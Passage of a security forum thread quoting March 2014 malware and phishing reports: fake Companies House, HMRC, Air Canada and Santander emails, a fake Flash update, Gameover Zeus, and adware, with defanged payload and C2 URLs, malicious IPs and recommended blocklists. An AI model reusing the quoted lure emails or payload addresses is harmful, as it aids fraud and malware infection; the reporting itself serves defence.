** https://malwr.com/analysis/MWI1MGFlY...MzMmViZTk4ZjI/
- https://www.virustotal.com/en/ip-add...1/information/
___
Fake Companies House SPAM and 50.116.4.71 (again)
- http://blog.dynamoo.com/2014/03/comp...471-again.html
21 Mar 2014 - "This -fake- Companies House spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 11:05:35 +0100 [06:05:35 EDT]
From: Companies House [WebFiling@ companieshouse .gov .uk]
Subject: Incident 8435407 - Companies House
The submission number is: 8435407
For more details please check attached file.
Please quote this number in any communications with Companies House.
All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.
Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other Organizations that handle public funds.
If you have any queries please contact the Companies House Contact Centre
on +44 (0)303 1234 500 or email enquiries@companies-house .gov .uK
Note: This email was sent from a notification-only email address which cannot
accept incoming email. Please do not reply directly to this message...
Attached is an archive file CH_Case_8435407.zip which in turn contains the malicious executable CH_Case_21032014.scr which has a VirusTotal detection rate of 3/49*. The Malwr analysis -again- shows an attempted connection to a Linode IP at 50.116.4.71 using the domain aulbbiwslxpvvphxnjij .biz. The malware also downloads a config file from a hacked WordPress installation at [donotclick]premiercrufinewine .co .uk/wp-content/uploads/2014/03/2103UKp.qta plus a number of other domains that are not resolving (listed below). I would recommend... the following blocklist in combination with this one.
50.116.4.71
aulbbiwslxpvvphxnjij.biz ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/fil...is/1395396703/
___
Fake Air Canada Ticket - malware
- http://www.threattracksecurity.com/i...icket-malware/
Mar 20, 2014 - "... The email (pictured below) was directed to an employee inbox purporting to be from Air Canada and directing the recipient to download and print their ticket. (Note: Air Canada was not hacked, nor were they part of this malware. The malicious URL distributing a previously unidentified malware is simply being masked to look like it’s coming from Air Canada.)
> http://www.threattracksecurity.com/i...ious-Email.png
The link hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?action=download&fid=QB820910108CA pointed to another address, hxxp ://alienstub.com/pdf_ticket_820910108.zip, which hosts the malware, a zipped malicious file. Once the zip file is decompressed, the user will see a file called pdf_ticket_820910108.pif . Analysis by ThreatSecure quickly revealed the sample as an exploit categorized with a high severity (see in-product analysis screen below), exhibiting malicious behavior like disabling the Windows firewall, changing proxy settings in Internet Explorer, opening the command prompt, creating executable files and connecting to Windows Remote Access Connection Manager.
> http://www.threattracksecurity.com/i...f-analsysi.jpg
... At the time of posting this blog, 16/51* antivirus vendors on VirusTotal detect this file as being malicious. The domain hxxp ://alienstub .com appears to be registered in China...
* https://www.virustotal.com/en/file/d...7622/analysis/
alienstub .com
108.162.198.134 - https://www.virustotal.com/en-gb/ip-...4/information/
108.162.199.134 - https://www.virustotal.com/en-gb/ip-...4/information/
:fear: :mad:
Malware sites to block 23/3/14 (P2P/Gameover Zeus)
FYI...
Malware sites to block 23/3/14 (P2P/Gameover Zeus)
- http://blog.dynamoo.com/2014/03/malw...ock-23314.html
23 Mar 2014 - "These domains and IPs are associated with the Peer-to-peer / Gameover variant of Zeus as described in this blog post at MalwareMustDie*. I recommend that you -block- the -IPs- and/or domains listed as they are all malicious:
50.116.4.71 (Linode, US) ...
178.79.178.243 (Linode, UK)
212.71.235.232 (Linode, UK)
23.239.140.156 (Root Level Technology, US)
50.116.4.71 ...
178.79.178.243 ...
212.71.235.232 ...
23.239.140.156 ..."
(More - long list of domains listed at the dynamoo URL above.)
* http://blog.malwaremustdie.org/2014/...er-crooks.html
:mad::mad: :fear:
Fake Flash update hosted on OneDrive, HMRC SPAM
FYI...
Fake Flash update hosted on OneDrive
- http://blog.dynamoo.com/2014/03/js-i...sh-update.html
25 Mar 2014 - "This kind of attack is nothing new, but there has been a sharp uptick recently in injection attacks that alter .js files on vulnerable systems. The payload is a -fake- Flash update with a surprisingly low detection rate, hosted on Microsoft OneDrive. The first step in the attack is through a vulnerable site such as this one [urlquery*]. In turn, the infected .js file leads to [donotclick]alientechdesigns .com/NLBFH8ZG.php?id=88473423 which in turn leads to a fake Flash popup hosted at [donotclick]alientechdesigns .com/NLBFH8ZG.php?html=27 which you can see an approximation of here [urlquery**].
> https://lh3.ggpht.com/-sLx4s_0GoKQ/U...fake-flash.jpg
The link in the popup goes to a download loction at [donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21111 which downloads a file flashplayerinstaller.exe. flashplayerinstaller.exe is the first stage in the infection, it has a VirusTotal detection rate of just 3/51***. The Malwr report shows that this then downloads two additional components, from:
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21112
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21108
The first one of these is called flashplayer2.exe which has a VirusTotal detection rate of 4/51 [5]. Malwr, Anubis and Comodo CAMAS show some working of this malware. The second file is called update2.exe with a VirusTotal detection rate of 5/49****. This seems somewhat resistant to automated analysis tools... This sort of attack is hard to block from a network point of view as it leverages legitimate sites. Perhaps the best way to protect yourself is a bit of user education about where it is appropriate to download updates from."
* http://urlquery.net/report.php?id=1395739538065
** http://urlquery.net/report.php?id=1395739786885
*** https://www.virustotal.com/en-gb/fil...is/1395739964/
**** https://www.virustotal.com/en-gb/fil...is/1395742041/
5] https://www.virustotal.com/en/file/9...is/1395740434/
___
Fake HMRC SPAM
- http://blog.dynamoo.com/2014/03/you-...ages-from.html
25 Mar 2014 - "This fake HMRC spam comes with a malicious attachment:
Date: Tue, 25 Mar 2014 12:59:28 +0100 [07:59:28 EDT]
From: "noreply@hmrc .gov .uk" [noreply@hmrc .gov .uk]
Subject: You have received new messages from HMRC
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Please do not reply to this e-mail.
1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system. 2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices....
The attachment is called HMRC_TAX_Notice_rep.zip which in turn contains a malicious exectuable HMRC_TAX_Notice_rep.scr which has a VirusTotal detection rate of 5/51*. According to the Malwr report, the malware makes a download from the following locations hosted on 67.205.16.21 (New Dream Network, US):
[donotclick]sandsca .com.au/directions/2503UKp.tis
[donotclick]www.sandsca .com.au/directions/2503UKp.tis
Subsequent communications are made with aulbbiwslxpvvphxnjij .biz on the familiar looking Linode IP of 50.116.4.71, and also qkdapcqinizsczxrwaelaimznfbqq .biz on another Linode IP of 178.79.178.243. An attempt it also made to connect to hzdmjjneyeuxkpzkrunrgyqgcukf .org which does not resolve...
Recommended blocklist:
50.116.4.71
178.79.178.243
sandsca .com
aulbbiwslxpvvphxnjij .biz
qkdapcqinizsczxrwaelaimznfbqq .biz
hzdmjjneyeuxkpzkrunrgyqgcukf .org "
* https://www.virustotal.com/en-gb/fil...is/1395750216/
- https://www.virustotal.com/en/ip-add...1/information/
- https://www.virustotal.com/en/ip-add...1/information/
- https://www.virustotal.com/en/ip-add...3/information/
___
Google Drive Email - Phish ...
- http://www.hoax-slayer.com/google-dr...ing-scam.shtml
Mar 25, 2014 - "... email requests recipients to click a link to view a document that the sender uploaded using Google Cloud Drive. There is no document to be viewed, urgent or otherwise. The email is a -phishing- scam designed to trick recipients into giving their email login details to Internet criminals... Example:
Hello,
Kindly click the link to view the document I uploaded for you using Google
cloud drive.
[Link removed]
Just Sign in with your email to view the document, it is very important.
Thank you,
Rev. Dr. Karen [Surname Removed]
Serving Humanity Spiritually
[Phone number removed]
Good works are links that form a chain of love.
Mother Teresa
Screenshot of phishing website:
> http://www.hoax-slayer.com/images/go...ing-scam-1.jpg
... Users who fall for the ruse and click the link as instructed will be taken to a -bogus- website that includes the Google Drive logo along with a login screen that asks for both their email address and email password. If users submit their email credentials as requested and click the 'View document' button, they will be redirected to Google's Gmail home page... however, their email address and password will be sent to online criminals. The criminals can use the stolen details to hijack webmail accounts belonging to victims. Hijacked accounts can be used to perpetrate more scam and spam campaigns, all in the names of the victims. If victims submitted details for a Gmail account, the scammers may be able to use the same login information to access other Google services as well as email..."
___
Gameover ZeuS now targets users of employment websites
- http://net-security.org/malware_news.php?id=2745
Mar 25, 2014 - "Some newer variants of the Gameover Zeus Trojan, which is exceptionally good at using complex web injections to perform Man-in-the-Browser (MITB) attacks and gain additional information about the victims to be used for bypassing multi-factor authentication mechanisms and effecting social engineering attacks, has been spotted targeting users of popular employment websites. They initially focused on CareerBuilder.com (largest employment website in the US), but now also on Monster.com (one of the largest in the world). The -fake- login page victims are served with looks virtually identical to the legitimate one, but the next one is web form injected by the malware:
> http://www.net-security.org/images/a...r-25032014.jpg
There are 18 different questions to choose from, and they range from the name of the city where your sibling lives/you got your first job/you met your spouse, to the name of your school(s)/friend/work supervisor and significant dates and numbers in your life..."
- http://www.f-secure.com/weblog/archives/00002687.html
March 25, 2014
___
Deceptive ads expose users to the Adware.Linkular/Win32.SpeedUpMyPC.A PUAs
- http://www.webroot.com/blog/2014/03/...-applications/
Mar 25, 2014 - "Rogue vendors of Potentially Unwanted Applications (PUAs) continue tricking tens of thousands of gullible users into installing deceptive and privacy violating applications. Largely relying on ‘visual social engineering’ tactics and basic branding concepts, the majority of campaigns convincingly present users with legitimately looking ToS (Terms of Service)/EULA (End User License Agreements) which socially engineered users accept, thereby assuming the responsibility for the potential privacy-violating activities taking place on their host. We’ve recently spotted yet another PUA campaign, relying on deceptive “Download Now” types of ads, enticing users into downloading the bogus GetMyFiles (Adware.Linkular) application, as well as the rogue SpeedUpMyPC (Win32.SpeedUpMyPC.A) PUA...
Sample screenshot of Adware.Linkular download page:
> https://www.webroot.com/blog/wp-cont...pplication.png
Sample screenshot of Win32.SpeedUpMyPC.A download page:
> https://www.webroot.com/blog/wp-cont...ication_01.png
Domain name reconnaissance:
getmyfilesnow .info – 54.208.165.36
getmyfilesnow .com – 174.142.147.2
coollinks .us – 174.142.147.5
linkular .com – 208.109.216.125
Detection rate for the PUA: MD5: 0d60941d1ec284cab2e861e05df89511 * ...
Known to have responded to 54.208.165.36 ...
Once executed, the sample phones back to:
hxxp // 107.23.152.80 /api/software/?s=887&os=win32&output=1&v=2.2.2&l=1033&np=0&osv=5.1&b=ie&bv=8.0.6001.18702&c=12&cv=2.2.2.1768
Sample detection rate for the Win32.SpeedUpMyPC.A PUA:
MD5: 0a8ecb11e39db5647dcad9f0cc938c99 ** ... "
* https://www.virustotal.com/en/file/2...is/1395713453/
** https://www.virustotal.com/en/file/e...is/1395717259/
:mad::mad: :fear:
Something evil on 173.212.223.249, Fake PDF malware...
FYI...
Something evil on 173.212.223.249
- http://blog.dynamoo.com/2014/03/some...212223249.html
26 Mar 2014 - "There's some sort of evil at work here, but I can't quite replicate it.. however I would recommend that you put a block in for 173.212.223.249 (Network Operations Center, US). The infection chain I have spotted here starts with a typical compromised website, in this case:
[donotclick]onerecipedaily .com/prawn-patia-from-anjum-anands-i-love-curry/
A quick look at the URLquery report* shows a general alert, but no smoking gun.. The incident logs come up with a generic detection... The following malicious subdomains are also active on 173.212.223.249:
bkbr.beuqnyrtz .com
syb.beuqnyrtz .com
sxxmxv.beuqnyrtz .info
The simplest thing to do to protect yourself against this particular threat is to use the following blocklist:
173.212.223.249
beuqnyrtz .com
beuqnyrtz .info "
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1395844844686
- https://www.virustotal.com/en/ip-add...9/information/
- https://www.virustotal.com/en/ip-add...1/information/
___
Info from SantanderBillpayment. co .uk - fake PDF malware
- http://myonlinesecurity.co.uk/info-s...e-pdf-malware/
26 Mar 2014 - "Info from SantanderBillpayment.co.uk pretending to come from Santanderbillpayment-noreply@SantanderBillPayment .co .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. Analysis of this one is showing it likely to be a Gameover Zeus/Zbot variant. This is “new” — it’s going after a similar URL as the Pony samples we have been seeing in the last few weeks, but completely different binary. This has VM detection and if it detects that, it runs routines to choke memory and the CPU. On real hardware, it tries this URL (http :// 62.76.45.233 /2p/1.exe) given recent patterns, this is likely to be a Gameover production...
Thank you for using BillPay. Please keep this email for your records.
The following transaction was received on 18 March 2014 at 20:03:41.
Payment type: VAT
Customer reference no: 9789049470611
Card type: Visa Debit
Amount: 483.93 GBP
Your transaction reference number for this payment is IR19758383.
Please quote this reference number in any future communication regarding this payment.
Full information in attachment.
Yours sincerely,
Banking Operations
This message is intended for the named person above and may be confidential, privileged or otherwise protected from disclosure...
26 March 2014 : VAT_F37D8FE5F9.zip (72kb) : Extracts to ATT00347_761105586544.pdf.exe
Current Virus total detections: 7/51* MALWR Auto Analysis** ...
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...d4a2/analysis/
** https://malwr.com/analysis/NTQyOGVhN...RlMDZmMjVhMDk/
- https://www.virustotal.com/en/ip-add...3/information/
:mad::fear::sad: